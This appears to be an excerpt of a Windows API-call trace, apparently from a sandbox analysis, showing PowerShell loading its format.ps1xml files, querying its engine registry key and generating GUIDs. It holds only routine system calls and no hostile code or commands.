	[0318.317] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cce60 | out: lpFileInformation=0x1cce60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0318.317] SetErrorMode (uMode=0x1) returned 0x1
	[0318.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0318.317] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ccf48 | out: phkResult=0x1ccf48*=0x330) returned 0x0
	[0318.317] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ccecc, lpData=0x0, lpcbData=0x1ccec8*=0x0 | out: lpType=0x1ccecc*=0x1, lpData=0x0, lpcbData=0x1ccec8*=0x56) returned 0x0
	[0318.317] CoTaskMemAlloc (cb=0x5a) returned 0x31b710
	[0318.317] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cce9c, lpData=0x31b710, lpcbData=0x1cce98*=0x56 | out: lpType=0x1cce9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cce98*=0x56) returned 0x0
	[0318.317] CoTaskMemFree (pv=0x31b710) 
	[0318.317] RegCloseKey (hKey=0x330) returned 0x0
	[0318.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0318.319] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x11bde376, Data2=0x5d39, Data3=0x43de, Data4=([0]=0xac, [1]=0xae, [2]=0x55, [3]=0xb8, [4]=0x67, [5]=0xf9, [6]=0x3, [7]=0x40))) returned 0x0
	[0318.319] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x6424fadc, Data2=0xa353, Data3=0x4e69, Data4=([0]=0x92, [1]=0x1, [2]=0x5e, [3]=0x68, [4]=0xa0, [5]=0xf5, [6]=0xdf, [7]=0xe6))) returned 0x0
	[0318.319] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x55fff0bf, Data2=0x2632, Data3=0x4ce0, Data4=([0]=0xa5, [1]=0x74, [2]=0xdf, [3]=0x5b, [4]=0x46, [5]=0x16, [6]=0x25, [7]=0x2a))) returned 0x0
	[0318.319] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x720518b4, Data2=0xc62d, Data3=0x44da, Data4=([0]=0xa1, [1]=0xfb, [2]=0x4f, [3]=0x9c, [4]=0xa5, [5]=0x38, [6]=0x69, [7]=0x25))) returned 0x0
	[0318.319] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x11fcfbfe, Data2=0xcca3, Data3=0x4112, Data4=([0]=0x85, [1]=0xf4, [2]=0x7d, [3]=0x3e, [4]=0x5c, [5]=0xf5, [6]=0x95, [7]=0xb9))) returned 0x0
	[0318.319] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xa3230c20, Data2=0x64e3, Data3=0x48fb, Data4=([0]=0x80, [1]=0x91, [2]=0xf3, [3]=0x12, [4]=0x8b, [5]=0x43, [6]=0x44, [7]=0x2a))) returned 0x0
	[0318.320] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xfc49a3f3, Data2=0xed84, Data3=0x4d2f, Data4=([0]=0x98, [1]=0x6e, [2]=0xf8, [3]=0x32, [4]=0x79, [5]=0xc0, [6]=0x4a, [7]=0xce))) returned 0x0
	[0318.320] VirtualQuery (in: lpAddress=0x1cbb20, lpBuffer=0x1cc9e0, dwLength=0x30 | out: lpBuffer=0x1cc9e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.320] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x7494c4ad, Data2=0xce39, Data3=0x42e0, Data4=([0]=0xac, [1]=0xd2, [2]=0x37, [3]=0xaa, [4]=0xc8, [5]=0xb4, [6]=0x29, [7]=0xae))) returned 0x0
	[0318.320] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xeb265c07, Data2=0xe972, Data3=0x4fa5, Data4=([0]=0xba, [1]=0xad, [2]=0x4a, [3]=0x52, [4]=0x98, [5]=0xd4, [6]=0xc1, [7]=0x74))) returned 0x0
	[0318.320] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x8988b07c, Data2=0x57ef, Data3=0x408a, Data4=([0]=0x89, [1]=0x29, [2]=0x54, [3]=0x4a, [4]=0x1a, [5]=0xfd, [6]=0x18, [7]=0x63))) returned 0x0
	[0318.320] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xf76c2b23, Data2=0x3787, Data3=0x4164, Data4=([0]=0x93, [1]=0x67, [2]=0xf8, [3]=0x53, [4]=0xfd, [5]=0x76, [6]=0xcd, [7]=0xd7))) returned 0x0
	[0318.321] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xf9d0a1f2, Data2=0x18c1, Data3=0x4860, Data4=([0]=0x91, [1]=0x8a, [2]=0x3d, [3]=0xe1, [4]=0xe9, [5]=0x48, [6]=0xb2, [7]=0x45))) returned 0x0
	[0318.321] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x43ea1233, Data2=0x9656, Data3=0x4a63, Data4=([0]=0x9b, [1]=0xf8, [2]=0xe, [3]=0x3f, [4]=0x55, [5]=0x77, [6]=0xc3, [7]=0xe7))) returned 0x0
	[0318.594] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x2fa84069, Data2=0x7ffe, Data3=0x4da0, Data4=([0]=0x89, [1]=0x30, [2]=0xbc, [3]=0x39, [4]=0xd3, [5]=0xa5, [6]=0xe5, [7]=0x10))) returned 0x0
	[0318.594] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x4da8b2f1, Data2=0xdfdf, Data3=0x4539, Data4=([0]=0x93, [1]=0x34, [2]=0x81, [3]=0x7c, [4]=0xd4, [5]=0xc3, [6]=0x2e, [7]=0x6e))) returned 0x0
	[0318.594] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x620fefdc, Data2=0xeb0a, Data3=0x476a, Data4=([0]=0xa4, [1]=0xfb, [2]=0xf6, [3]=0x65, [4]=0xde, [5]=0x9, [6]=0x52, [7]=0x37))) returned 0x0
	[0318.594] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xfa560c8f, Data2=0x12d7, Data3=0x4a41, Data4=([0]=0x98, [1]=0x8d, [2]=0xdd, [3]=0x9a, [4]=0x2f, [5]=0x3c, [6]=0xf3, [7]=0xf))) returned 0x0
	[0318.595] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xb3014205, Data2=0xd52d, Data3=0x4be7, Data4=([0]=0x90, [1]=0x39, [2]=0x69, [3]=0x62, [4]=0x2b, [5]=0xc7, [6]=0xd4, [7]=0xc6))) returned 0x0
	[0318.595] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x93159c16, Data2=0xf65b, Data3=0x4661, Data4=([0]=0xb9, [1]=0x77, [2]=0x1f, [3]=0x8f, [4]=0x3f, [5]=0x29, [6]=0x6d, [7]=0x2a))) returned 0x0
	[0318.595] VirtualQuery (in: lpAddress=0x1cbb20, lpBuffer=0x1cc9e0, dwLength=0x30 | out: lpBuffer=0x1cc9e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.595] VirtualQuery (in: lpAddress=0x1cbb20, lpBuffer=0x1cc9e0, dwLength=0x30 | out: lpBuffer=0x1cc9e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.595] VirtualQuery (in: lpAddress=0x1cbb20, lpBuffer=0x1cc9e0, dwLength=0x30 | out: lpBuffer=0x1cc9e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.595] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xba50ed9d, Data2=0xbf50, Data3=0x4153, Data4=([0]=0xae, [1]=0xd2, [2]=0x8c, [3]=0xf4, [4]=0xde, [5]=0xb7, [6]=0xc, [7]=0xae))) returned 0x0
	[0318.596] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x12a22e93, Data2=0x204a, Data3=0x4cfe, Data4=([0]=0xa5, [1]=0xdd, [2]=0x32, [3]=0xbe, [4]=0x12, [5]=0x2, [6]=0x8a, [7]=0xda))) returned 0x0
	[0318.596] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x8cc3b53a, Data2=0xdb53, Data3=0x42e2, Data4=([0]=0xaa, [1]=0xd3, [2]=0xb7, [3]=0x3f, [4]=0x1a, [5]=0x43, [6]=0x7c, [7]=0xe5))) returned 0x0
	[0318.596] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xa7450d53, Data2=0x569a, Data3=0x4526, Data4=([0]=0xb8, [1]=0xe8, [2]=0xeb, [3]=0xf, [4]=0x5a, [5]=0x8b, [6]=0xa1, [7]=0xb1))) returned 0x0
	[0318.596] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xddb06ac5, Data2=0x34d6, Data3=0x42e9, Data4=([0]=0x95, [1]=0x31, [2]=0xe2, [3]=0x55, [4]=0x37, [5]=0xfc, [6]=0x20, [7]=0x30))) returned 0x0
	[0318.596] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x52f49ae7, Data2=0x53e5, Data3=0x4deb, Data4=([0]=0xb0, [1]=0x42, [2]=0xd1, [3]=0x55, [4]=0x15, [5]=0xa2, [6]=0x1e, [7]=0x8c))) returned 0x0
	[0318.596] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xf1855ee2, Data2=0x16dc, Data3=0x475b, Data4=([0]=0x99, [1]=0xfd, [2]=0x5c, [3]=0x24, [4]=0xbe, [5]=0x27, [6]=0x18, [7]=0x7c))) returned 0x0
	[0318.596] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xec7c6886, Data2=0xb0cf, Data3=0x4a54, Data4=([0]=0xa2, [1]=0x27, [2]=0x8e, [3]=0x84, [4]=0x43, [5]=0x94, [6]=0xb6, [7]=0xb))) returned 0x0
	[0318.596] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x3c0ae426, Data2=0x4942, Data3=0x4eb4, Data4=([0]=0xab, [1]=0x1d, [2]=0xa5, [3]=0x83, [4]=0x58, [5]=0x93, [6]=0x59, [7]=0x37))) returned 0x0
	[0318.597] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x6d432dc3, Data2=0x2c3f, Data3=0x409e, Data4=([0]=0xa5, [1]=0xc0, [2]=0xce, [3]=0x7c, [4]=0xe5, [5]=0xfa, [6]=0x50, [7]=0x6f))) returned 0x0
	[0318.597] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x743b545, Data2=0xfece, Data3=0x471d, Data4=([0]=0x8c, [1]=0x64, [2]=0xaa, [3]=0xcc, [4]=0x30, [5]=0x5d, [6]=0x81, [7]=0x82))) returned 0x0
	[0318.597] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xa614d179, Data2=0x7109, Data3=0x4fba, Data4=([0]=0xa4, [1]=0xc9, [2]=0xb9, [3]=0x72, [4]=0x2f, [5]=0xc5, [6]=0xa2, [7]=0x36))) returned 0x0
	[0318.597] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x21b0fa49, Data2=0xecba, Data3=0x4287, Data4=([0]=0x90, [1]=0xbb, [2]=0xae, [3]=0x86, [4]=0x66, [5]=0x1d, [6]=0x6f, [7]=0xf))) returned 0x0
	[0318.597] VirtualQuery (in: lpAddress=0x1cbb20, lpBuffer=0x1cc9e0, dwLength=0x30 | out: lpBuffer=0x1cc9e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.597] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xde647b69, Data2=0x3f1e, Data3=0x489c, Data4=([0]=0xaf, [1]=0xfa, [2]=0x26, [3]=0x63, [4]=0x11, [5]=0x95, [6]=0x8c, [7]=0xd8))) returned 0x0
	[0318.597] VirtualQuery (in: lpAddress=0x1cbb20, lpBuffer=0x1cc9e0, dwLength=0x30 | out: lpBuffer=0x1cc9e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.598] VirtualQuery (in: lpAddress=0x1cbb20, lpBuffer=0x1cc9e0, dwLength=0x30 | out: lpBuffer=0x1cc9e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.598] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x12d67b40, Data2=0xec79, Data3=0x4337, Data4=([0]=0xa7, [1]=0x2d, [2]=0xe4, [3]=0x99, [4]=0x88, [5]=0x7b, [6]=0xc, [7]=0x48))) returned 0x0
	[0318.598] VirtualQuery (in: lpAddress=0x1cbb20, lpBuffer=0x1cc9e0, dwLength=0x30 | out: lpBuffer=0x1cc9e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.599] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xe51b3203, Data2=0x1766, Data3=0x406f, Data4=([0]=0x88, [1]=0x32, [2]=0x1e, [3]=0xda, [4]=0xc1, [5]=0x1f, [6]=0xcf, [7]=0xa7))) returned 0x0
	[0318.599] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xaaf97c5a, Data2=0x6d44, Data3=0x43b7, Data4=([0]=0xb0, [1]=0xa5, [2]=0x47, [3]=0xda, [4]=0x76, [5]=0xdb, [6]=0x45, [7]=0xd6))) returned 0x0
	[0318.599] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xb8bae9b6, Data2=0x6e11, Data3=0x49bd, Data4=([0]=0x8c, [1]=0x6, [2]=0x2d, [3]=0xc3, [4]=0x2e, [5]=0xda, [6]=0x5c, [7]=0xcf))) returned 0x0
	[0318.599] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xc1982e8, Data2=0x93a, Data3=0x41b9, Data4=([0]=0x8e, [1]=0xe9, [2]=0xf1, [3]=0x0, [4]=0x86, [5]=0xf9, [6]=0x4c, [7]=0x37))) returned 0x0
	[0318.599] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xe0db97d8, Data2=0x2e2b, Data3=0x470b, Data4=([0]=0xb5, [1]=0xf9, [2]=0xa1, [3]=0x0, [4]=0x83, [5]=0xba, [6]=0x51, [7]=0x37))) returned 0x0
	[0318.599] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x9ad150c1, Data2=0xdd2b, Data3=0x471d, Data4=([0]=0x8a, [1]=0xc, [2]=0x46, [3]=0x64, [4]=0x76, [5]=0xe0, [6]=0x98, [7]=0xf9))) returned 0x0
	[0318.600] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x77ba6541, Data2=0x6675, Data3=0x4eaa, Data4=([0]=0x9b, [1]=0xbe, [2]=0x1d, [3]=0x14, [4]=0xd2, [5]=0x1d, [6]=0x91, [7]=0xc5))) returned 0x0
	[0318.600] VirtualQuery (in: lpAddress=0x1cbb20, lpBuffer=0x1cc9e0, dwLength=0x30 | out: lpBuffer=0x1cc9e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.600] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xa4a35f05, Data2=0x1bc9, Data3=0x4aba, Data4=([0]=0x99, [1]=0xba, [2]=0xf5, [3]=0xdd, [4]=0x30, [5]=0xee, [6]=0x5b, [7]=0xb5))) returned 0x0
	[0318.600] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xe0aa9e2, Data2=0x54a4, Data3=0x4d76, Data4=([0]=0x98, [1]=0xe1, [2]=0xf6, [3]=0x25, [4]=0x8a, [5]=0xb, [6]=0xbe, [7]=0xa6))) returned 0x0
	[0318.600] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xf0445476, Data2=0xf0d, Data3=0x433b, Data4=([0]=0xb9, [1]=0xb3, [2]=0xfd, [3]=0xe6, [4]=0x9a, [5]=0xa9, [6]=0x8, [7]=0x2a))) returned 0x0
	[0318.600] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xb385bc1f, Data2=0x6648, Data3=0x4760, Data4=([0]=0x8a, [1]=0xb7, [2]=0xdb, [3]=0xe4, [4]=0xf0, [5]=0xad, [6]=0x24, [7]=0xce))) returned 0x0
	[0318.600] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xae3521f9, Data2=0xd64e, Data3=0x4a1b, Data4=([0]=0xa5, [1]=0xda, [2]=0xa9, [3]=0xaa, [4]=0x94, [5]=0x10, [6]=0x14, [7]=0x57))) returned 0x0
	[0318.601] VirtualQuery (in: lpAddress=0x1cbb20, lpBuffer=0x1cc9e0, dwLength=0x30 | out: lpBuffer=0x1cc9e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.601] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xfb864d28, Data2=0xacc5, Data3=0x4662, Data4=([0]=0x83, [1]=0x36, [2]=0xeb, [3]=0x76, [4]=0x8e, [5]=0xa1, [6]=0x10, [7]=0x10))) returned 0x0
	[0318.601] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x5cad9800, Data2=0x1c63, Data3=0x4419, Data4=([0]=0x80, [1]=0xab, [2]=0xd3, [3]=0xb0, [4]=0x5b, [5]=0xa, [6]=0xe6, [7]=0x3e))) returned 0x0
	[0318.601] VirtualQuery (in: lpAddress=0x1cbb90, lpBuffer=0x1cca50, dwLength=0x30 | out: lpBuffer=0x1cca50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.601] VirtualQuery (in: lpAddress=0x1cbb90, lpBuffer=0x1cca50, dwLength=0x30 | out: lpBuffer=0x1cca50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.601] VirtualQuery (in: lpAddress=0x1cbb90, lpBuffer=0x1cca50, dwLength=0x30 | out: lpBuffer=0x1cca50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.601] VirtualQuery (in: lpAddress=0x1cbb90, lpBuffer=0x1cca50, dwLength=0x30 | out: lpBuffer=0x1cca50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.602] SetErrorMode (uMode=0x1) returned 0x1
	[0318.602] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0318.602] GetFileType (hFile=0x330) returned 0x1
	[0318.602] SetErrorMode (uMode=0x1) returned 0x1
	[0318.602] GetFileType (hFile=0x330) returned 0x1
	[0318.602] ReadFile (in: hFile=0x330, lpBuffer=0x315b5a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x315b5a0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.602] ReadFile (in: hFile=0x330, lpBuffer=0x315b5a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x315b5a0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.603] ReadFile (in: hFile=0x330, lpBuffer=0x315b5a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x315b5a0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.603] ReadFile (in: hFile=0x330, lpBuffer=0x315b5a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x315b5a0*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.603] ReadFile (in: hFile=0x330, lpBuffer=0x315b5a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x315b5a0*, lpNumberOfBytesRead=0x1cceb8*=0x8b4, lpOverlapped=0x0) returned 1
	[0318.603] ReadFile (in: hFile=0x330, lpBuffer=0x315a9bc, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x315a9bc*, lpNumberOfBytesRead=0x1cceb8*=0x0, lpOverlapped=0x0) returned 1
	[0318.603] ReadFile (in: hFile=0x330, lpBuffer=0x315b5a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x315b5a0*, lpNumberOfBytesRead=0x1cceb8*=0x0, lpOverlapped=0x0) returned 1
	[0318.603] SetErrorMode (uMode=0x1) returned 0x1
	[0318.603] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cce60 | out: lpFileInformation=0x1cce60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0318.604] SetErrorMode (uMode=0x1) returned 0x1
	[0318.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0318.604] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ccf48 | out: phkResult=0x1ccf48*=0x330) returned 0x0
	[0318.604] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ccecc, lpData=0x0, lpcbData=0x1ccec8*=0x0 | out: lpType=0x1ccecc*=0x1, lpData=0x0, lpcbData=0x1ccec8*=0x56) returned 0x0
	[0318.604] CoTaskMemAlloc (cb=0x5a) returned 0x31b710
	[0318.604] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cce9c, lpData=0x31b710, lpcbData=0x1cce98*=0x56 | out: lpType=0x1cce9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cce98*=0x56) returned 0x0
	[0318.604] CoTaskMemFree (pv=0x31b710) 
	[0318.604] RegCloseKey (hKey=0x330) returned 0x0
	[0318.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0318.604] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xe9a91b00, Data2=0xa0ac, Data3=0x4a6d, Data4=([0]=0xa9, [1]=0xce, [2]=0x5d, [3]=0xaf, [4]=0xe, [5]=0xff, [6]=0x92, [7]=0xd9))) returned 0x0
	[0318.605] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x4be4504d, Data2=0xf48c, Data3=0x4f76, Data4=([0]=0x8f, [1]=0xd2, [2]=0x93, [3]=0x9, [4]=0xb9, [5]=0x56, [6]=0x6a, [7]=0x92))) returned 0x0
	[0318.605] SetErrorMode (uMode=0x1) returned 0x1
	[0318.605] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0318.605] GetFileType (hFile=0x330) returned 0x1
	[0318.605] SetErrorMode (uMode=0x1) returned 0x1
	[0318.605] GetFileType (hFile=0x330) returned 0x1
	[0318.605] ReadFile (in: hFile=0x330, lpBuffer=0x3199388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x3199388*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.605] ReadFile (in: hFile=0x330, lpBuffer=0x3199388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x3199388*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
